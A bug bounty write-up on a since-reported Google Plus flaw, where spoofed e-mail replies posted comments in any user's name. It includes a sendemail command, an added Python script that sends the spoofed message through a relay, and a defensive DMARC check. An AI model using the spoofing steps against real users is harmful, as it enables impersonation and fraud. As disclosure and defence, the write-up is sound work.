Google Bug Bounty: Commenting on any user's behalf.
Hey peeps,
Hope you all are doing well :) Today I'll be sharing one of my findings in Google Plus. As you have already guessed from the title, this issue is a user impersonation vulnerability: using it, an attacker could have commented on any user's behalf. All the attacker needs is the victim's e-mail address, and when it comes to Google you don't have to worry much about getting it; there is usually a way around, or you can just enumerate e-mail addresses ^_^. Whatever, first things first: I got the initial idea from this one by Zahid Ali, so a big thanks goes to Zahid :)
Proof Of Concept:
Well, it's very easy.
All you have to do is send a mail from the victim's e-mail address (the mail will be posted as a comment). The reply-by-mail handler trusted the From address of the reply without checking that the message was actually authenticated, so a plain e-mail spoof was enough. But how do you spoof an e-mail address?
Well, there are plenty of e-mail spoofing websites you'll find.
However, I used smtp2go to reproduce the bug.
Steps to reproduce:
First of all, create an account on smtp2go.com. After that, you'll be given an SMTP password.
Now
I'll use two accounts. Using the first account, comment on a post.
Now, using the second account, comment on the same post.
After that, the first account receives an e-mail saying another user has commented on the same post, and if you reply to that e-mail, the reply is posted as a comment. Just pressing the Reply button gives us the reply-to e-mail address, which is what we need.
A few options are needed to send the e-mail with sendemail from a terminal emulator. These are the ones I used.
-f means from. So I'll enter the victim's e-mail after -f. In my testing, I'll be posting from my test account, whose e-mail is sonjoyd45@gmail.com
-t means to. So I'll use the reply-to e-mail here, which we found before.
-u means subject. We can ignore this, as it is not necessary.
-m means message. This is where I'll write the comment.
-s means server and port. As we're using the smtp2go server, the server and port will be mail.smtp2go.com:2525
-xu means the smtp2go username. Mine is asad0x01@gmail.com
-xp means the smtp2go account password. Mine is **********
This is what mine looked like:
sendemail -f sonjoyd45@gmail.com -t replyto+CkJDZ3huY0d4MWMxOXpkSEpsWVcwYUlYb3hNbTEyTVhWM2RtMXhZbmRtZHpFeE1qTXdlV3hoY1hCclpYRjZOWGx0ZUEQ3YqjoZYFKiF6MTJtdjF1d3ZtcWJ3ZncxMTIzMHlsYXFwa2VxejV5bXg+AI3v7_UAAAAAWVpeiPboAVpgGvveUFlIbF1NLqajFk5h@plus.google.com -u whatever -m this is test comment -s mail.smtp2go.com:2525 -xu asad0x01@gmail.com -xp *********
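The same sendemail invocation expressed in Python, as an added example that is not part of the original post: it builds the message from the same four values (-f, -t, -u, -m) and then submits it through an authenticated relay the way sendemail does, with the envelope sender (MAIL FROM) set to the spoofed From address. The relay credentials and all addresses are placeholders (assumptions, not the accounts used in the write-up), the STARTTLS step is an assumption about the relay, and the RecordingSMTP class stands in for smtplib.SMTP so the script runs offline.

```python
import smtplib
from email.message import EmailMessage

# Placeholders (assumptions for this example, not the accounts in the write-up)
VICTIM = "victim@example.com"                 # sendemail -f
REPLY_TO = "replyto+TOKEN@plus.google.com"    # sendemail -t (reply address from the notification)
RELAY = "mail.smtp2go.com:2525"               # sendemail -s
RELAY_USER = "attacker@example.com"           # sendemail -xu
RELAY_PASSWORD = "relay-password"             # sendemail -xp


def build_spoofed_message(from_addr, to_addr, subject, body):
    """Headers sendemail sets from -f / -t / -u / -m. From is simply
    whatever we claim; nothing on our side stops us naming the victim."""
    msg = EmailMessage()
    msg["From"] = from_addr
    msg["To"] = to_addr
    msg["Subject"] = subject
    msg.set_content(body)
    return msg


class RecordingSMTP:
    """Offline stand-in for smtplib.SMTP: records the SMTP envelope instead
    of connecting. Pass smtplib.SMTP itself to actually send."""
    sent = []

    def __init__(self, host, port):
        self.host, self.port, self.user = host, port, None

    def __enter__(self):
        return self

    def __exit__(self, *exc):
        return False

    def ehlo(self):
        pass

    def starttls(self):
        pass

    def login(self, user, password):
        self.user = user

    def send_message(self, msg, from_addr=None, to_addrs=None):
        RecordingSMTP.sent.append({"relay_user": self.user,
                                   "mail_from": from_addr,
                                   "rcpt_to": list(to_addrs),
                                   "header_from": str(msg["From"])})


def send_via_relay(msg, server, relay_user, relay_password, smtp_factory=smtplib.SMTP):
    """Submit through an authenticated relay. The relay authenticates *us*
    (relay_user), not the address in From, so MAIL FROM and the From header
    both carry the victim's address, exactly what sendemail -f produces."""
    host, _, port = server.partition(":")
    envelope = {"mail_from": str(msg["From"]), "rcpt_to": [str(msg["To"])]}
    with smtp_factory(host, int(port or 25)) as smtp:
        smtp.ehlo()
        smtp.starttls()          # assumption: the relay offers STARTTLS on this port
        smtp.login(relay_user, relay_password)
        smtp.send_message(msg, from_addr=envelope["mail_from"],
                          to_addrs=envelope["rcpt_to"])
    return envelope


if __name__ == "__main__":
    spoofed = build_spoofed_message(VICTIM, REPLY_TO, "whatever", "this is test comment")
    print(send_via_relay(spoofed, RELAY, RELAY_USER, RELAY_PASSWORD,
                         smtp_factory=RecordingSMTP))
```

The point the envelope makes visible: the only identity the relay verifies is the relay account, so both the SMTP MAIL FROM and the From header are attacker-chosen. Whether the receiving side notices is entirely down to SPF/DKIM/DMARC evaluation on the victim's domain and to whether the application honours that result.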
Pressing Enter, we'll receive a response saying the e-mail was sent successfully 😄
Refresh the post page and guess what? A comment has been made on the victim's behalf :")
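The check a reply-by-mail handler needs before attributing a comment to the From address, as an added example that is not part of the original post and not a description of how Google fixed this: only trust From when the Authentication-Results header stamped by your own inbound MX reports dmarc=pass for a domain aligned with From. The three messages, the authserv-id mx.example.net and the reply-to token are constructed for the example; it assumes the border MTA strips any pre-existing Authentication-Results headers that claim its own authserv-id, as RFC 8601 requires, so the topmost one bearing that id is genuinely ours.

```python
import re
from email import message_from_string
from email.utils import parseaddr

# authserv-id of our own inbound MX (assumption for this example)
OUR_AUTHSERV_ID = "mx.example.net"

# Constructed sample 1: a reply spoofed through a third-party relay. Our MX
# recorded SPF/DKIM/DMARC failures, but with a p=NONE policy the message is
# still delivered, so the application has to look at the verdict itself.
SPOOFED = """\
Authentication-Results: mx.example.net;
 spf=fail smtp.mailfrom=victim@gmail.com;
 dkim=none;
 dmarc=fail (p=NONE sp=NONE dis=NONE) header.from=gmail.com
From: victim@gmail.com
To: replyto+TOKEN@plus.example.net
Subject: whatever

this is test comment
"""

# Constructed sample 2: a genuine reply, authenticated end to end.
LEGIT = """\
Authentication-Results: mx.example.net;
 spf=pass smtp.mailfrom=victim@gmail.com;
 dkim=pass header.i=@gmail.com;
 dmarc=pass (p=NONE sp=NONE dis=NONE) header.from=gmail.com
From: Victim <victim@gmail.com>
To: replyto+TOKEN@plus.example.net
Subject: whatever

a real reply
"""

# Constructed sample 3: the attacker pre-stamps a "pass" under some other
# authserv-id and our MX added nothing; there is no trustworthy verdict.
FORGED = """\
Authentication-Results: relay.attacker.example; dmarc=pass header.from=gmail.com
From: victim@gmail.com
To: replyto+TOKEN@plus.example.net
Subject: whatever

this is test comment
"""


def dmarc_verdict(msg, authserv_id=OUR_AUTHSERV_ID):
    """Return (dmarc result, header.from domain) from the topmost
    Authentication-Results header stamped by our own MX, or (None, None).
    Headers carrying another authserv-id are ignored: anything upstream
    of our MX could have written them."""
    for raw in msg.get_all("Authentication-Results", []):
        value = " ".join(raw.split())            # unfold continuation lines
        head, _, rest = value.partition(";")
        stamped_by = head.split()[0].lower() if head.split() else ""
        if stamped_by != authserv_id.lower():
            continue
        result = re.search(r"\bdmarc=([a-z]+)", rest, re.I)
        domain = re.search(r"\bheader\.from=([\w.-]+)", rest, re.I)
        return (result.group(1).lower() if result else None,
                domain.group(1).lower() if domain else None)
    return (None, None)


def authenticated_sender(raw_message):
    """Address that may be used as the comment author, or None when the
    message must not be attributed to its From header."""
    msg = message_from_string(raw_message)
    _, from_addr = parseaddr(msg.get("From", ""))
    from_domain = from_addr.rpartition("@")[2].lower()
    result, aligned_domain = dmarc_verdict(msg)
    if from_domain and result == "pass" and aligned_domain == from_domain:
        return from_addr
    return None


if __name__ == "__main__":
    for name, sample in (("spoofed", SPOOFED), ("legit", LEGIT), ("forged", FORGED)):
        print(name, "->", authenticated_sender(sample))
```

Two caveats worth keeping in mind. A sender domain whose DMARC policy is p=none asks receivers to deliver failing mail anyway, so relying on the mailbox provider to drop spoofs is not enough; the handler must require a pass itself, as above. And a stronger design removes the dependence on From altogether by making the token in the reply-to address a secret bound to the recipient account, so that whoever can reply to that address is, by construction, the account that received the notification.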